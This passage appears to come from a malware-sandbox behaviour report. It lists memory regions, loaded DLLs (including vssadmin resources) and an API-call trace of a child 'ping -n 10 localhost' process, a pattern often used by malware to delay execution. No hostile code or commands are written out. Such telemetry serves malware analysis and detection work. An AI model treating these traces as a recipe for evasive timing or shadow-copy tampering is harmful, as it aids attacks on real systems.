0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24920 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24921 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24922 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24923 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 24924 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24925 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24926 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24927 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24928 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 24929 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24930 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24991 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24992 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24993 start_va = 0xe0000 end_va = 0xecfff entry_point = 0xe0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 24994 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24995 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 24996 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 24997 start_va = 0x980000 end_va = 0x157ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 24998 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 25002 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 25003 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 25004 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 25005 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25006 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 25007 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 25008 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 25009 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 25010 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 25011 start_va = 0x1580000 end_va = 0x184efff entry_point = 0x1580000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 25012 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 25217 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25218 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 25219 start_va = 0x6e440000 end_va = 0x6e449fff entry_point = 0x6e440000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 25220 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25221 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 440 os_tid = 0xc90 Thread: id = 448 os_tid = 0x63c Thread: id = 449 os_tid = 0x8d4 Thread: id = 451 os_tid = 0xc88 Thread: id = 452 os_tid = 0xb94 Process: id = "327" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16ce0" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "ping -n 10 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24850 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24851 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24852 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24853 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 24854 start_va = 0x1a0000 end_va = 0x1a7fff entry_point = 0x1a0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 24855 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24856 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24857 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24858 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24859 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24860 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24861 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24862 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24863 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 24864 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24865 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 24866 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 24867 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24868 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24869 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 24870 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24871 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24872 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24873 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24874 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24875 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24876 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 24877 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24878 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24879 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24880 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 24881 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24882 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24883 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 24884 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 24885 start_va = 0x70000 end_va = 0x72fff entry_point = 0x70000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 24886 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 24887 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 24888 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 24889 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 24890 start_va = 0x1180000 end_va = 0x144efff entry_point = 0x1180000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 24891 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 24892 start_va = 0x1450000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 24893 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 24904 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 24905 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 24906 start_va = 0x15a0000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 24931 start_va = 0x14f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 24932 start_va = 0x1560000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 24933 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 24934 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 24940 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 24941 start_va = 0x16d0000 end_va = 0x187ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 24966 start_va = 0x14b0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 24967 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 24999 start_va = 0x1610000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 25000 start_va = 0x1690000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 25001 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 441 os_tid = 0x5fc [0178.744] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfc84 | out: lpSystemTimeAsFileTime=0xcfc84*(dwLowDateTime=0xa0328880, dwHighDateTime=0x1d440a9)) [0178.744] GetCurrentProcessId () returned 0xca4 [0178.744] GetCurrentThreadId () returned 0x5fc [0178.744] GetTickCount () returned 0x33b1c [0178.744] QueryPerformanceCounter (in: lpPerformanceCount=0xcfc7c | out: lpPerformanceCount=0xcfc7c*=23553295227) returned 1 [0178.744] GetModuleHandleA (lpModuleName=0x0) returned 0x1a0000 [0178.744] __set_app_type (_Type=0x1) [0178.744] __p__fmode () returned 0x76b331f4 [0178.744] __p__commode () returned 0x76b331fc [0178.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1a2ae1) returned 0x0 [0178.745] __getmainargs (in: _Argc=0x1a50d4, _Argv=0x1a50dc, _Env=0x1a50d8, _DoWildCard=0, _StartInfo=0x1a50e8 | out: _Argc=0x1a50d4, _Argv=0x1a50dc, _Env=0x1a50d8) returned 0 [0178.745] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.745] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0178.745] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1a5440 | out: lpWSAData=0x1a5440) returned 0 [0178.751] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xcf714 | out: phkResult=0xcf714*=0x58) returned 0x0 [0178.751] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xcf708, lpData=0xcf710, lpcbData=0xcf70c*=0x4 | out: lpType=0xcf708*=0x0, lpData=0xcf710*=0x0, lpcbData=0xcf70c*=0x4) returned 0x2 [0178.751] RegCloseKey (hKey=0x58) returned 0x0 [0178.751] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xcf6dc*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xcf704 | out: ppResult=0xcf704*=0x0) returned 11001 [0178.751] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xcf6dc*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xcf704 | out: ppResult=0xcf704*=0x2c37b0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x2c3878*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2c38a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2c2818*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0178.953] FreeAddrInfoW (pAddrInfo=0x2c37b0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x2c3878*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2c38a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2c2818*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0178.953] Icmp6CreateFile () returned 0x2c8bb0 [0179.010] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2c38f0 [0179.010] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x2cec28 [0179.010] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0179.010] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0xcf704, nSize=0x0, Arguments=0xcf700 | out: lpBuffer="\x189,") returned 0x19 [0179.011] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x2c3918, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0179.011] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.011] _write (in: _FileHandle=1, _Buf=0x2c3918*, _MaxCharCount=0x19 | out: _Buf=0x2c3918*) returned 25 [0179.011] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0179.011] LocalFree (hMem=0x2c3918) returned 0x0 [0179.011] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\x189,") returned 0x18 [0179.011] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x2c3918, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0179.012] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.012] _write (in: _FileHandle=1, _Buf=0x2c3918*, _MaxCharCount=0x18 | out: _Buf=0x2c3918*) returned 24 [0179.012] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0179.012] LocalFree (hMem=0x2c3918) returned 0x0 [0179.012] SetConsoleCtrlHandler (HandlerRoutine=0x1a17ca, Add=1) returned 1 [0179.012] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0179.014] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0179.014] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0179.014] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0179.014] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.014] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0179.014] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0179.014] LocalFree (hMem=0x2c51e0) returned 0x0 [0179.014] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0179.014] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0179.014] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.014] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0179.014] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0179.014] LocalFree (hMem=0x2c2a10) returned 0x0 [0179.014] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0179.014] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0179.014] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0179.014] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0179.015] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0179.015] LocalFree (hMem=0x2c8f90) returned 0x0 [0179.015] Sleep (dwMilliseconds=0x3e8) [0180.576] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0181.371] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0181.371] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0181.371] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0181.371] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0181.371] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0181.371] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0181.371] LocalFree (hMem=0x2c51e0) returned 0x0 [0181.371] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0181.372] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0181.372] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0181.372] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0181.372] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0181.372] LocalFree (hMem=0x2c2a10) returned 0x0 [0181.372] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, 